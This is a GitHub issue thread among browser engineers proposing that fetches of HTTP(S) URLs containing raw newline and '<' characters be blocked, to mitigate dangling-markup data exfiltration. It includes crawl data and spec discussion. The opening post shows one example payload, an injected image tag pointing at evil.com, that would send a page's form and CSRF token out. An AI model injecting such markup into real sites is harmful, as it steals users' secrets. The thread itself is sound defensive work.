Prevent requests to HTTP(S) URLs containing raw `\n` and `<`. #546

mikewest · 2017-05-22T10:01:56Z

In https://crbug.com/680970, we've been iterating on some metrics in Chrome in the hopes of implementing some simple heuristics that would reduce the risk of data exfiltration due to dangling markup insertion. That is, consider a page like:

Hello, [XSS INJECTION POINT, OH NOES!]!

<form action="https://sekrit.endpoint/?sekrit=query">
  <input type="hidden" name="csrf" value="token">
  <input type="submit" value="Clicky click!">
</form>  
<p>Click the button, it's awesome!</p>

If an attacker can inject something like <img src='https://evil.com/?whatever=, the browser will happily suck up the whole form, close the URL at the ' in it's, and close the <img with the > in </p>, sending the secret data out to evil.com via the image requests thus generated.

I'd suggest that we can mitigate this risk by blocking fetches for URLs containing both raw \n and < characters. I'd love to simply block \n entirely, but that seems more widely-used than I can justify breaking.

From Chrome's beta channel, we see the following numbers over the last week:

0.4708% of page views parse a URL containing \n.
0.2749% actually fetch a url containing \n.
0.0189% of page views parse a URL a URL containing both \n and <.
I forgot that < is percent-encoded by the time we get to fetching, so my data here is crap. Assuming the same ratio, 0.0110% of page views might fetch a URL containing \n and <.

0.01% is not nothing, so I've dug into the data a little more. Details below, but the TL;DR is that I don't think blocking fetches for URLs with HTTP(S) schemes that contained both \n and < before parsing would break sites that aren't already broken. It does look like it would have some effect on advertising scripts, but those shared scripts seem most likely to update quickly if/when this change started to affect someone's bottom line.

I'll send out some PRs shortly to sketch this out in more detail, but I'd like to get some feedback from other vendors here. WDYT, @annevk, @mozfreddyb, @ckerschb, @dveditz, @hillbrad, @johnwilander, and @travisleithead (and whoever else y'all decide to CC).

Results

Using an internal tool to crawl a list of 100k sites (culled from a somewhat-old version of Alexa's 1M), I got 96 pages that parsed a URL containing both \n and <. Of those, 25 actually fetched such a URL:

http://www.alikhbariaattounisia.com/ contains <img src="<!DOCTYPE html>\n<html lang="en" ... where the image URL looks like it's been populated with an error page result.
http://www.bethesdamagazine.com/ fails to close the src attribute on <img alt="Bethesda Magazine May-June 2017 - May-June 2017" class="cover" iar="1" q="85" src="http://rivista-cdn.bethesdamagazine.com/images/cache/cache_9/cache_6/cache_9/MayJune2017Cover-ff589969.jpeg?ver=1494990796&aspectratio=0.76113360323887 /> </a></div>
http://www.ralphlauren.fr/ and http://www.ralphlauren.co.uk both load http://click.exacttarget.com/conversion.aspx?xml=%3Csystem%3E%3Csystem_name%3Etracking%3C/system_name%3E%3Caction%3Econversi... where the URL has been generated by a system that contains raw tabs.

http://www.521mx.cn (which generated a safe browsing warning, so, be careful out there) contains:

<img src="<!--大图默认start-->


<a href="http://pic.yesky.com/10/125409510_2.shtml" target="_self">

http://www.viralnovas.com contains <script async="true" src="//pmpubs.com/ps?cfg=56783775&sid=viralnovas”></script> (note the curly closing-quote)
http://www.abc-cash.com/ builds http://www.abc-cash.com/feeds/posts/default?alt=json-in-script&max-results=document.write(%22%3Cscript%20src=\%22&call... out of the contents of a script element.
http://www.hotnews.ro/, htttp://elohell.net/ and http://www.onisep.fr/ build a link to http://pre.glotgrx.com/ that contains raw JavaScript as its query string. Apparently intentionally.
http://www.zajenata.bg builds a tracking link that contains raw HTML content (http://pik.bg/?utm_source=kartite&utm_medium=cpm&utm_term=direct%3E%3C/iframe%3E%3C/div%3E%20%20%20%20%20%20%3C/...)

http://www.lien-torrent.com/ (which has pretty NSFW ads) has a PHP error in an iframe's src attribute:

<iframe class="verticalifr" scrolling="No" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" src="http://www.lien-torrent.com/eticilbup/<br />
<b>Notice</b>:  Undefined variable: cid in <b>/home/lien-torrent/public_html/index.php</b> on line 
<b>183</b><br />
affiche.php?f=verticaledroit">`)

http://www.motive.com.tw/ doesn't close a src attribute: <img width="510" height="381" src="http://i.imgur.com/YXGS5ml.jpg <BR>共8堂陸續開課中</A><BR>
https://menunedeli.ru/ doesn't close an attribute in a link tag: <link type="text/css" rel="stylesheet" href="/wp-content/themes/freshfruits11/style-new.css?v=11 />
http://www.theradicals.com uses curly-quotes to close a script tag: <script src="//ad.adip.ly/dlvr/adiply_statmarg.min.js?site_id=TheRadicalsSide_AP&t=400”></script>
http://susiesreviews.com/ contains some template escaping errors <script arial="" font-family:="" helvetica="" sans-serif="" src="https://widget-prime.rafflecopter.com/launch.</span></div><div><span style=">
http://www.rcnradio.com only loads data: URLs matching the criteria.
https://www.shape5.com/ opens a script tag with a single-quote, and closes it with a double-quote: <script type='text/javascript' src='https://my.sendinblue.com/public/theme/version3/js/subscribe-validate.js?v=1465900639"></script>
http://www.universalorlandovacations.com loads an ad frame, which closes a src with curly-quotes: <img src="https://sp.analytics.yahoo.com/spp.pl?a=10000&.yp=11416&ec=BK”/>
http://bestgif.su/ doesn't close an img tag: <img src="http://bestgif.su/_ph/35/2/51564987...

http://www.gliffy.com/ has a PHP error instead of a stylesheet:

<link rel="stylesheet" type="text/css" href="<br />
<b>Warning</b>:  constant(): Couldn't find constant EMBER_S3_BUCKET in 
<b>/var/www/html/index.php</b> on line <b>20</b><br />
/assets/vendor.css">`

http://www.vandvshop.com doesn't close a src: <img alt="" height="100" src="http://www.vandvshop.com/image/Merry-Xmas-Animated-ij44-1(1).gif></div>
http://www.dsogaming.com closes a src with curly-quotes: <script type="text/javascript" src="https://n-cdn.areyouahuman.com/play/a3c2693aa8a5bb495f9782afbc476134243f2ab2?AYAH_F1=[oarex_dsogaming]”>
http://www.iteye.com/ includes an ad script that builds up a URL containing raw JavaScript. Apparently intentionally.

http://www.9384.com/ has a PHP error instead of an image:

<img class="shop-img" src="<br />
<b>Notice</b>:  Undefined index: picture in <b>/var/www/9384/htm3/tpl/scr/index.php</b> on line 
<b>149</b><br />
_220x220.jpg" alt="" />

The text was updated successfully, but these errors were encountered:

mikewest · 2017-05-22T10:43:33Z

Old fetch patch at #519, old URL patch at whatwg/url#284. Tests at https://cs.chromium.org/chromium/src/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute.html, which I'll happily upstream if other folks are interested.

annevk · 2017-05-22T11:12:15Z

For Mozilla @valenting and @mcmanus are also good candidates to provide feedback I think.

tigt · 2017-05-22T17:31:08Z

There are many tutorials with inline SVG data: URIs that don't bother URL-encoding them, like this one from CSS-Tricks:

You can leave the encoding in UTF-8, and drop the syntax right in there! Like this:
<img src='data:image/svg+xml;utf8,<svg ... > ... </svg>'>

(Also, yes, the character encoding declaration is malformed.)

This may not be a huge issue because Firefox and IE never supported unencoded < in data: URIs, but I figured it was worth bringing up.

mikewest · 2017-05-22T18:25:10Z

I was only planning to block http and https URLs. If it turns out that we can block unencoded < in data: as well, I wouldn't have a problem doing so. If Firefox and IE don't support that syntax, perhaps we can get away with it?

I'll look at the data again on that point in particular tomorrow.

progers · 2017-05-22T18:30:45Z

@tigt , that was definitely the case recently and I remember folks hitting issues with the cross browser support. It looks like things have changed recently though. I just checked (http://output.jsbin.com/cosuraj/quiet/) and Edge, Chrome, Safari, and Firefox all render these svg data uris with < and newlines.

I suspect the XSS issues are fewer with data uris because of how they are used (simple icons).

FWIW, I did a search on the httparchive to see how prevalent these cases are:
21692 out of 17095966 urls matched "data:image.svg.xml.utf8".

tigt · 2017-05-23T00:06:56Z

The .utf8 isn't necessary, as even malformed charset expressions work (since the URI is already in a known encoding, usually).

Good to see browsers converged, though. I think even Chrome/WebKit still barf on non-ASCII octets in Unicode, but that's no longer under this issue's scope.

annevk · 2017-05-23T03:32:17Z

If Firefox and IE don't support that syntax, perhaps we can get away with it?

I think they do support it. (FWIW, ;utf8 doesn't do anything. If you specified ;charset=... you might see some differences.)

mikewest · 2017-05-31T13:41:59Z

We plan to ship an implementation of the strategy outlined here in Blink (targeting Chrome 61).

I've filed https://bugs.webkit.org/show_bug.cgi?id=172748 and https://bugzilla.mozilla.org/show_bug.cgi?id=1369029 to solicit more feedback from other folks.

annevk · 2021-02-15T17:38:46Z

It seems that per feedback from WebKit this would be reasonable if it was restricted to URLs that could occur in markup, rather than all URLs.

mikewest · 2021-02-16T07:19:21Z

I'm asking around in Chromium to see if anyone has time to invest here; it's a good mitigation, and I'd like to get this specified in a way folks can generally accept. Is whatwg/url#284 (comment) still the way you think we'd approach it, given how things are specified today?

annevk · 2021-02-16T07:23:54Z

Yeah that still makes sense to me. We'd create "parse an element URL" that you pass an element and an attribute local name (and maybe optionally an attribute namespace for SVG) and that does the rest.

shhnjk · 2023-05-30T21:23:48Z

It seems like the HTML spec has a wrapper around URL parsing. Isn't it enough to move the logic defined in whatwg/url#284 directly in that wrapper?

annevk · 2023-05-31T10:46:03Z

I think that could work, though we should investigate the callers of the wrapper and make sure it only applies to actual XSS endpoints.

domenic · 2023-05-31T10:59:54Z

I doubt that would work... I think HTML uses that wrapper sometimes, and the URL parser directly sometimes, with very little care. You'd probably need to check what the actual XSS endpoints are and introduce a new algorithm which they call?

shhnjk · 2023-05-31T18:23:18Z

I'm happy to introduce a new algorithm, but if we have one already maybe it can be reused to give it a nice purpose (and ensure that it is used in dangling markup injection sinks)?

annevk · 2023-05-31T18:27:43Z

@domenic is correct that you'll have to review all the callers and all the callers of the URL parser algorithm and ensure it all lines up with the goals of this feature. And where it doesn't, you'll have to make changes to account for that. I'm not sure offhand if it's easier to start out with this algorithm and fix the couple cases that are wrong or start with something new.

shhnjk · 2023-05-31T18:30:04Z

Got it. I will investigate which one is easier and choose that direction!

mikewest changed the title ~~Prevent requests to URLs containing raw \n and <.~~ Prevent requests to HTTP(S) URLs containing raw \n and <. May 22, 2017

annevk added the addition/proposal New features or enhancements label Apr 12, 2018

annevk mentioned this issue Feb 15, 2021

Record whether the URL parser removed newlines. whatwg/url#284

Closed

This comment has been minimized.

Sign in to view

mikewest mentioned this issue May 22, 2023

Ignore dangling markup in target name whatwg/html#9309

Merged

3 tasks

mozfreddyb mentioned this issue May 23, 2023

Ignore target names which contain both \n and < characters mozilla/standards-positions#804

Closed

This was referenced Dec 26, 2023

Prevent requests to HTTP(S) URLs containing raw \n and < whatwg/html#10021

Open

Implement dangling markup injection mitigation whatwg/html#10022

Open

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Prevent requests to HTTP(S) URLs containing raw `\n` and `<`. #546

Prevent requests to HTTP(S) URLs containing raw `\n` and `<`. #546

mikewest commented May 22, 2017

mikewest commented May 22, 2017

annevk commented May 22, 2017

tigt commented May 22, 2017

mikewest commented May 22, 2017

progers commented May 22, 2017 •

edited

Loading

tigt commented May 23, 2017

annevk commented May 23, 2017

mikewest commented May 31, 2017

annevk commented Feb 15, 2021

mikewest commented Feb 16, 2021

annevk commented Feb 16, 2021

This comment has been minimized.

shhnjk commented May 30, 2023

annevk commented May 31, 2023

domenic commented May 31, 2023

shhnjk commented May 31, 2023

annevk commented May 31, 2023 •

edited

Loading

shhnjk commented May 31, 2023

Prevent requests to HTTP(S) URLs containing raw \n and <. #546

Prevent requests to HTTP(S) URLs containing raw \n and <. #546

Comments

mikewest commented May 22, 2017

mikewest commented May 22, 2017

annevk commented May 22, 2017

tigt commented May 22, 2017

mikewest commented May 22, 2017

progers commented May 22, 2017 • edited Loading

tigt commented May 23, 2017

annevk commented May 23, 2017

mikewest commented May 31, 2017

annevk commented Feb 15, 2021

mikewest commented Feb 16, 2021

annevk commented Feb 16, 2021

This comment has been minimized.

shhnjk commented May 30, 2023

annevk commented May 31, 2023

domenic commented May 31, 2023

shhnjk commented May 31, 2023

annevk commented May 31, 2023 • edited Loading

shhnjk commented May 31, 2023

Prevent requests to HTTP(S) URLs containing raw `\n` and `<`. #546

Prevent requests to HTTP(S) URLs containing raw `\n` and `<`. #546

progers commented May 22, 2017 •

edited

Loading

annevk commented May 31, 2023 •

edited

Loading